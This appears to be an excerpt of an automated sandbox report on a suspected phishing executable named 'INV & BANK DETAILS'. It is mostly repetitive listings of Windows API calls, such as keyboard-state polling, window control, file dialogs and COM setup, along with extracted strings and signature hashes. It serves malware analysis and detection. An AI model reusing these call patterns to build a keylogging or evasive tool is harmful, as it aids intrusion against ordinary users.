                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: MessageSend$CharNext
                                • String ID:
                                • API String ID: 1350042424-0
                                • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                APIs
                                  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                • _wcscpy.LIBCMT ref: 004787E5
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                • API String ID: 3052893215-2127371420
                                • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                APIs
                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                • __swprintf.LIBCMT ref: 0045E7F7
                                • _wprintf.LIBCMT ref: 0045E8B3
                                • _wprintf.LIBCMT ref: 0045E8D7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                • API String ID: 2295938435-2354261254
                                • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: __swprintf_wcscpy$__i64tow__itow
                                • String ID: %.15g$0x%p$False$True
                                • API String ID: 3038501623-2263619337
                                • Opcode ID: ae3af1561c0bf2b56ac7df6aaaed7414d93e467e0ef5a85da2365562e19c9239
                                • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                • Opcode Fuzzy Hash: ae3af1561c0bf2b56ac7df6aaaed7414d93e467e0ef5a85da2365562e19c9239
                                • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                APIs
                                • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                • __swprintf.LIBCMT ref: 0045E5F6
                                • _wprintf.LIBCMT ref: 0045E6A3
                                • _wprintf.LIBCMT ref: 0045E6C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                • API String ID: 2295938435-8599901
                                • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                APIs
                                • timeGetTime.WINMM ref: 00443B67
                                  • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                • IsWindow.USER32(00000000), ref: 00443C3A
                                • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                  • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                  • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                  • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                • String ID: BUTTON
                                • API String ID: 1834419854-3405671355
                                • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                • LoadStringW.USER32(00000000), ref: 00454040
                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                • _wprintf.LIBCMT ref: 00454074
                                • __swprintf.LIBCMT ref: 004540A3
                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                • API String ID: 455036304-4153970271
                                • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                APIs
                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                • _memmove.LIBCMT ref: 00467EB8
                                • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                • _memmove.LIBCMT ref: 00467F6C
                                • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                • String ID:
                                • API String ID: 2170234536-0
                                • Opcode ID: 41a2085762b778bd090c4eb4d83ea17da09509ac4ed3f8b2896fc2a1aa5f0729
                                • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                • Opcode Fuzzy Hash: 41a2085762b778bd090c4eb4d83ea17da09509ac4ed3f8b2896fc2a1aa5f0729
                                • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                APIs
                                • GetKeyboardState.USER32(?), ref: 00453CE0
                                • SetKeyboardState.USER32(?), ref: 00453D3B
                                • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                • GetKeyState.USER32(000000A0), ref: 00453D75
                                • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                • GetKeyState.USER32(000000A1), ref: 00453DB5
                                • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                • GetKeyState.USER32(00000011), ref: 00453DEF
                                • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                • GetKeyState.USER32(00000012), ref: 00453E26
                                • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                • GetKeyState.USER32(0000005B), ref: 00453E5D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: State$Async$Keyboard
                                • String ID:
                                • API String ID: 541375521-0
                                • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                APIs
                                • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Window$ItemMoveRect$Invalidate
                                • String ID:
                                • API String ID: 3096461208-0
                                • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                APIs
                                • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                • DeleteObject.GDI32(?), ref: 0047151E
                                • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                • DeleteObject.GDI32(?), ref: 004715EA
                                • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                • String ID:
                                • API String ID: 3218148540-0
                                • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                • String ID:
                                • API String ID: 136442275-0
                                • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                APIs
                                • _wcsncpy.LIBCMT ref: 00467490
                                • _wcsncpy.LIBCMT ref: 004674BC
                                  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                • _wcstok.LIBCMT ref: 004674FF
                                  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                • _wcstok.LIBCMT ref: 004675B2
                                • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                • _wcslen.LIBCMT ref: 00467793
                                • _wcscpy.LIBCMT ref: 00467641
                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                • _wcslen.LIBCMT ref: 004677BD
                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1430633126.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1430919948.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431005372.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431046348.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431116294.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1431149797.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_INV & BANK DETAILS.jbxd
                                Similarity
                                • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                • String ID: X
                                • API String ID: 3104067586-3081909835
                                • Opcode ID: e0c719383c523ef33ce473f5b235b96d5e8b705d2f751b88c5810ca8f90ea985
                                • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                • Opcode Fuzzy Hash: e0c719383c523ef33ce473f5b235b96d5e8b705d2f751b88c5810ca8f90ea985
                                • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                APIs
                                • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                • _wcslen.LIBCMT ref: 0046CDB0
                                • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                  • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                  • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                  • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                Strings
                                • NULL Pointer assignment, xrefs: 0046CEA6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1430689851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
